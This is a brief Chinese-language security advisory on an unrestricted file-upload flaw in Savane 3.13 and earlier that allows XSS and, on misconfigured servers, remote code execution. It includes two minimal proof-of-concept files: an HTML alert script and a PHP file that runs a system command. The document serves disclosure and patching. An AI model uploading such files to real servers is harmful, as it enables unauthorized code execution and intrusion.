在 Savane v3.13 及更早版本中,上传文件缺乏验证可能导致权限提升。按照安装说明配置的 Web 服务器容易受到跨站脚本(XSS)攻击。在配置错误的 Web 服务器中,这可能导致远程代码执行(RCE)。
CWE 分类: CWE-434:危险类型文件的无限制上传
报告者: Ally Petitt
受影响产品: Savane
受影响版本: 3.13 及更早版本
PoC.html
<script>
alert("XSS");
</script>
PoC.php
<?php
echo system("id");
?>
升级到 Savane 3.14 或更高版本。补丁可在此处找到。